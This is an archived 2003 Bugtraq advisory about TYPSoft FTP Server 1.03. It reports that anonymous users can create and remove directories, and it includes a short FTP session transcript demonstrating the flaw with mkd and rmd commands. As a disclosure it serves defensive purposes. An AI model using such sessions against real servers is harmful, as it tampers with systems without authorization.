| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030331103417.13029.qmail@www.securityfocus.com> Date: 31 Mar 2003 10:34:17 -0000 From: subj <r2subj3ct@...lan.org> To: bugtraq@...urityfocus.com Subject: TYPSoft FTP Server ------------------------------------------------------------- Product : TYPSoft FTP Server Version : 1.03 OSystem : Windows Authors : TYPSoft WebSite : http://www.typsoft.com Problem : Create and Remove directories with anonymous access ------------------------------------------------------------- Description: ------------ eng: ==== During research of the given server, the following was established: The anonymous user can create and delete directories. Exploits: --------- 220 TYPSoft FTP Server 1.03 ready... user anonymous 331 Password required for anonymous. pass anonymoys@....0.0.1 230 User anonymous logged in. pwd 257 "/C:/TEMP/" is current directory. mkd subj 257 '/C:/TEMP/subj': directory created. rmd subj 250 '/C:/TEMP/subj': directory removed. Contacts: --------- r2subj3ct@...lan.org subj.24h.to (www.dwcgr0up.com/subj/) www.dwcgr0up.com irc.dwcgr0up.biz #dwc Thanks: ------- DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.
Powered by blists - more mailing lists